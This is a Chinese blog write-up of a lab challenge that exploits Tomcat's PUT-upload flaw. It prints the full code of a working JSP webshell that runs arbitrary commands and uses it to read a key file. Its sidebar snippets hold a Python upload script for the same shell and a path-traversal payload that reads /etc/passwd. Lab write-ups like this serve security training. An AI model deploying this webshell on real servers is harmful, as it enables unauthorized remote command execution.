墨者学院-Tomcat 远程代码执行漏洞利用(第1题)

最新推荐文章于 2024-06-03 15:39:32 发布
最新推荐文章于 2024-06-03 15:39:32 发布
阅读量1k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/85631836
版权

刷新页面,进行抓包,右击发送到repeater

image.png
将GET改为OPTIONS,查看允许的请求方式
image.png

再改为PUT,写进一个jsp木马,,返回201,代表写入成功,代码内容如下

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>

<%!public static String excuteCmd(String c) {

StringBuilder line = new StringBuilder();

try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));

String temp = null;while ((temp = buf.readLine()) != null) {

line.append(temp+"\n");}buf.close();} catch (Exception e) {

line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){

out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>


image.png然后到主页上进行访问(ip+1.jsp),一级一级往上找(我自己是直接猜测在本目录下,不对,然后猜测在跟目录下,对了),发现key.txt
image.png


cat一下,拿到key
image.png

0ne_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者_Tomcat 远程代码执行漏洞利用(第1)
weixin_50698958的博客
10-12 397
靶场: https://www.mozhe.cn/bug/detail/WFVzRjBLZjFObGE4YjFwaGhXLzVldz09bW96aGUmozhe 背景介绍 “墨者”工程师对一个已经授权的网站进行测试,发现全是静态页面。以为没有漏洞,但在测试环境时发现Web 应用服务器是Tomcat,版本为7.0.79。你能找到漏洞吗? 实训目标 1、了解Tomcat配置; 2、了解特定版本的Tomcat漏洞; 3、掌握Tomcat远程代码执行漏洞利用方式; 解方向 通过Tomcat的代
Tomcat任意文件上传CVE-2017-12615漏洞JSP利用脚本
zhlhely的博客
09-27 581
#! -*- coding:utf-8 -*- import requests import sys body = ''' <%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try...
tomcat系列漏洞利用
最新发布
2401_84488537的博客
06-03 1407
Tomcat 服务器是一个开源的轻量级Web应用服务器,在中小型系统和并发量小的场合下被普遍使用。主要组件:服务器Server,服务Service,连接器Connector、容器Container。连接器Connector和容器Container是Tomcat的核心。一个Container容器和一个或多个Connector组合在一起,加上其他一些支持的组件共同组成一个Service服务,有了Service服务便可以对外提供能力了。
墨者学院 - Tomcat 远程代码执行漏洞利用(第1)
多崎巡礼的博客
09-17 1281
刷新fit网站 burp截包,repeater,更改不安全的HTTP方法为PUT(将get更改为options可查看服务器支持哪些) PUT /自定义文件名/ HTTP/1.1 eg:   PUT /9.jsp/ HTTP/1.1     (jsp后无空格,反之会报错) 添加以下代码 &lt;%@ page language="java" import="java.util.*,ja...
墨者学院 Ruby On Rails漏洞复现第一(CVE-2018-3760)
人若无名,便可专心练剑
11-06 956
发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。
Tomcat漏洞详解
m0_64481831的博客
03-06 2451
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件。
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **一句话Webshell后门**:这是一种简单的Web后门,仅用一行代码即可实现远程控制,常见于代码执行漏洞利用中。 **学习资源** - [《深入理解Web安全》](https://www.cnblogs.com/ermei/p/6689005.html) - ...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
memcached所需要的jar包---tomcat8.0
08-08
在标中提到的"memcached所需要的jar包---tomcat8.0",指的是为了在Tomcat 8.0服务器上集成和使用Memcached,你需要下载和添加特定的Java库(jar包)。这些jar包通常包含了与Memcached通信的Java客户端驱动,例如...
0x1B.Ruby On Rails漏洞复现第一(CVE-2018-3760)
qq_31679787的博客
10-14 522
构造payload,读取/etc/passwd文件; http://219.153.49.228:46944/assets/file:%2f%2f/etc/passwd passwd在黑名单中,不被允许访问,但是报错信息中给出了允许访问的目录,通过使用允许访问的目录可以跳转到/etc/passwd; payload如下:http://219.153.49.228:46944/asset...
墨者学院-Tomcat后台弱口令漏洞利用
臭nana的博客
09-21 292
目说是Tomcat后台弱口令,打开环境点击manage app 尝试弱口令,最后admin/123456成功登陆,部署war包拿到shell,进入文件系统 ​进入到根目录,看到key文件,点击edit,拿到key ...
360众测靶场库之24-Tomcat 远程代码执行漏洞利用(第1)
zjl12344的博客
03-07 307
360众测靶场
Tomcat远程代码执行漏洞(CVE-2017-12615)
热门推荐
Unitue_逆流
10-14 1万+
实验环境操作机:windows XPIP:172.16.11.2目标机:windows server 2003IP:172.16.12.2实验目的了解Tomcat远程代码执行漏洞危害掌握检测利用Tomcat远程代码执行漏洞的能力实验工具Firefox: 中文俗称火狐,一个自由及开放源代码网页浏览器实验内容 TomcatTomcat服务器是一个免费的开放源代码的Web应用服务器。Tomcat是Apa
buuctf [Tomcat]CVE-2017-12615
qq_1873822的博客
03-17 1539
漏洞简介 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行漏洞影响 Apache Tomcat 7.0.0 – 7.0.81 ...
Tomcat 远程代码执行漏洞分析(CVE-2017-12615)
fly小灰灰的专栏
11-06 6886
1. 漏洞描述 漏洞简述: 当tomcat启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 CVE编号:CVE-2017-12615 影响版本:Apache Tomcat 7.0.0-
CTF-Tomcat后台弱口令漏洞利用
asd158923328的博客
08-24 2143
根据意 进入环境,随便点击靶机链接,跳出一个登录界面,因为目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456 登录进去过后,发现有一个上传界面,根据解方向上传一个war木马即可: war木马的制作过程: jsp木马源码 <% if(“023”.equals(request.getParameter(“pwd”))){ java.io...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值